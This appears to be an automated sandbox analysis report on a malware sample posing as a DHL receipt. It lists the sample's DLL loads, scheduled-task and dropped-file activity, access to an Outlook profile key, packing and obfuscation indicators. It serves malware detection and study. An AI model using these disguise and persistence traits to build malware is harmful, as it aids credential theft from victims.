Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\EhStorAuthn.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\ZXOaRLCoeSNNEoKFyaoumZpJeMcfPOGWVlecKxxrxhQqGXIm\V7C903J7TTVs.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\EhStorAuthn.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: DHL AWB Receipt_pdf.bat.exe

Static file information: File size 1213448 > 1048576

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x108c00

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: EhStorAuthn.pdbGCTL source: RegSvcs.exe, 00000009.00000002.2350440474.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000010.00000003.2659580801.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb, source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4574054013.000000000261A000.00000004.00000020.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000000.2426576148.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2646108935.00000000236DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.2352110255.0000000001960000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000003.2352851312.000000000425E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000003.2349934787.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4575534812.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4575534812.0000000004410000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.2352110255.0000000001960000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000003.2352851312.000000000425E000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000003.2349934787.00000000040A8000.00000004.00000020.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4575534812.00000000045AE000.00000040.00001000.00020000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4575534812.0000000004410000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: EhStorAuthn.pdb source: RegSvcs.exe, 00000009.00000002.2350440474.00000000016B8000.00000004.00000020.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000010.00000003.2659580801.0000000001124000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: RegSvcs.pdb source: EhStorAuthn.exe, 00000011.00000002.4576292477.0000000004A3C000.00000004.10000000.00040000.00000000.sdmp, EhStorAuthn.exe, 00000011.00000002.4574054013.000000000261A000.00000004.00000020.00020000.00000000.sdmp, V7C903J7TTVs.exe, 00000012.00000000.2426576148.000000000339C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000014.00000002.2646108935.00000000236DC000.00000004.80000000.00040000.00000000.sdmp
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: V7C903J7TTVs.exe, 00000010.00000000.2271366936.0000000000F0F000.00000002.00000001.01000000.0000000E.sdmp, V7C903J7TTVs.exe, 00000012.00000002.4573978113.0000000000F0F000.00000002.00000001.01000000.0000000E.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, mSqAlnyPPcc8wFepWt.cs	.Net Code: msbfNHu8pG System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4e18530.2.raw.unpack, mSqAlnyPPcc8wFepWt.cs	.Net Code: msbfNHu8pG System.Reflection.Assembly.Load(byte[])
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.4ea2b50.5.raw.unpack, mSqAlnyPPcc8wFepWt.cs	.Net Code: msbfNHu8pG System.Reflection.Assembly.Load(byte[])

Source: DHL AWB Receipt_pdf.bat.exe

Static PE information: 0xE4568A68 [Thu May 24 20:26:16 2091 UTC]

Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: section name: Y8QY(+(j
Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: section name:
Source: nlvpnyUnaRqfA.exe.0.dr	Static PE information: section name: Y8QY(+(j
Source: nlvpnyUnaRqfA.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_08CA8B08 pushfd ; ret	0_2_08CA8B09
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A228A28 push E802005Eh; retf	0_2_0A228A61
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A228A64 push E801045Eh; ret	0_2_0A228A69
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A228A6C push E802005Eh; retf	0_2_0A228A61
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A22B808 pushfd ; ret	0_2_0A22B811
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A22B812 push DC00005Eh; ret	0_2_0A22B821
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A22F8EB push DCBA03D1h; ret	0_2_0A22F8F6
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A227D64 push E802005Eh; ret	0_2_0A227D69
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A24F828 push esp; ret	0_2_0A24F839
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A24C97C push eax; iretd	0_2_0A24C949
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A531772 push 0800005Eh; retf	0_2_0A531781
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 0_2_0A531792 push B000005Eh; iretd	0_2_0A5317F1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004071FF push C35DE58Bh; ret	9_2_00407237
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00403260 push eax; ret	9_2_00403262
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_00408395 push ss; ret	9_2_00408397
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004124E9 push eax; retf	9_2_004124EA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040B528 pushad ; retf	9_2_0040B52A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0040D53D push esi; retf	9_2_0040D53E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041ED9A pushad ; retf	9_2_0041ED9B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0041ED9E pushad ; iretd	9_2_0041EDA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_004146A6 push cs; iretd	9_2_004146BC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0196225F pushad ; ret	9_2_019627F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019627FA pushad ; ret	9_2_019627F9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_019909AD push ecx; mov dword ptr [esp], ecx	9_2_019909B6
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0196283D push eax; iretd	9_2_01962858
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01961368 push eax; iretd	9_2_01961369
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030DB808 pushfd ; ret	10_2_030DB811
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030DF8EB push DCBA03D1h; ret	10_2_030DF8F6
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_030FF828 push esp; ret	10_2_030FF839
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_089D4C47 push dword ptr [ebx]; retn 4589h	10_2_089D4C53
Source: C:\Users\user\AppData\Roaming\nlvpnyUnaRqfA.exe	Code function: 10_2_089D4943 push ebp; ret	10_2_089D4947

Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: section name: Y8QY(+(j entropy: 7.998200120784161
Source: DHL AWB Receipt_pdf.bat.exe	Static PE information: section name: .text entropy: 7.93396062771896
Source: nlvpnyUnaRqfA.exe.0.dr	Static PE information: section name: Y8QY(+(j entropy: 7.998200120784161
Source: nlvpnyUnaRqfA.exe.0.dr	Static PE information: section name: .text entropy: 7.93396062771896

Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, EBWhskrvCEPtVPOATn.cs	High entropy of concatenated method names: 'ToString', 'HLF6hH0x8r', 'C3M6SrN7Ko', 'Gsd6leKJRY', 'sFR6pLd1wP', 'QDU6Ge6EAJ', 'ivZ6vRq0Co', 'SHk6jDR8ta', 'joD6dhHEx1', 'e8w6DxRhLn'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, QFKFn7eitGer1JBE8h.cs	High entropy of concatenated method names: 'nTLZO52MEi', 'iITZcgVQki', 'uWDZME3rgy', 'yB5ZgP0pVF', 'gt9ZXUGE02', 'swkZygQtMx', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, UCiA7K7wjLdmmPftlK.cs	High entropy of concatenated method names: 'i29OnZq3mV', 'hGKOYe7V0K', 'uR5OL9Uq1H', 'kFUO79SoHQ', 'jfCOQ0saq2', 'tSHO6kpLDT', 'rXDOmjHI6x', 'UFjOHqyKmT', 'f5yOXw3nwL', 'SLYOZUC4oS'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, R1ODytOFedK3v5IOZD.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'uA5EU5mDSV', 'BUTEewI6KQ', 'b5jEzVCIfF', 'WKSbVGKILa', 'cDNbPkRVQk', 'MuCbEne7xo', 'hMobbiZgi3', 'uCBcGVqVTJZ3eyXPBEl'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, AlNuDJUggLFttP5jJX.cs	High entropy of concatenated method names: 'MS8X8X8nNM', 'JqjXSX2xyh', 'RZgXlk0q4u', 'EAcXpb9ySg', 'GUVXGUmLW9', 'pigXvwuJGn', 'NXWXjt4VKZ', 'SkFXdqUsG2', 'DmOXDvyaWK', 'OMEXC0VbqB'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, QnbCPmPPUiXqsWLcObU.cs	High entropy of concatenated method names: 'TwFZe40MiF', 'h0MZzeaFBy', 'eNkoVk2wfR', 'JCyoPqXoJZ', 'OYMoE746UR', 'Yb6obSjNMI', 'mvNofgrCba', 'TwCoxEQ7iy', 'v4JoJpRveV', 'srroWVkoWa'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, fgoSAhDZVN9m6fDqCl.cs	High entropy of concatenated method names: 'RNRgiHqjpK', 'vMjgBtIUPK', 'YKygNDJHcu', 'gUIgnD155x', 'En3g16AIoM', 'NrBgYj4yNX', 'gJug5U5sjD', 'rn4gLDKctV', 'A03g7nWFFD', 'CCngFuxdH5'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, vosZgN3LNmAqOa1Srk.cs	High entropy of concatenated method names: 'xyEmRvJWYp', 's9gmeAmdyn', 'PAhHVqiMin', 'DURHPUDT8A', 'vO1mhqV713', 'gT9mArKf3t', 'TpgmtMoB12', 'hwlm44j0EC', 'Ta3mI2P0Rv', 'QR5mrwW5T8'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, SIcdTrEchw0TPlw55H.cs	High entropy of concatenated method names: 'exvNR6dxn', 'RWlnZr14p', 'iNyYTDM4n', 'Y2B5ggXd8', 'Wc476HIK3', 'r1qFPDeAY', 'hnRCEhCrFGTrfcuPE5', 'WLSFYXhGwPs2Nv9xO9', 'hVEHTpcWB', 'pbiZiD3IB'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, cWZPgs8iW1YkkOKDqB.cs	High entropy of concatenated method names: 'N0GMxpgCDs', 'ANaMW9lRxR', 'Aa5McOHkbb', 'UUwMgtJPNg', 'R5KMyfUJGu', 'IXLc9SuuDM', 'Kxvc3vWlLm', 'mrDckmB67T', 'rrJcRHBPBm', 'vrVcUKMsNo'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, qVLyLfwEXMqNe86Mc5.cs	High entropy of concatenated method names: 'HwHm0kebyC', 'uCkmslwJsu', 'ToString', 'pNNmJ5EWPq', 'phkmWmRkq9', 'YnJmOUyjdt', 'BgLmcQIVDG', 'W0imMIUlCO', 'heCmgJ6IhC', 'AIxmyG4axO'
Source: 0.2.DHL AWB Receipt_pdf.bat.exe.aa40000.7.raw.unpack, SIndSeFc5hAYIpYVOr.cs	High entropy of concatenated method names: 'whBc10jvgN', 'neNc5GDqck', 'N3nOl3pJy3', 'pyQOpnhiQU', 'GZUOGF0Spy', 'Uh3Ovt9GoF', 'z0VOjy4XWX', 'erYOdwtoIu', 'MSKODa47FX', 'fwjOCJQvXF'
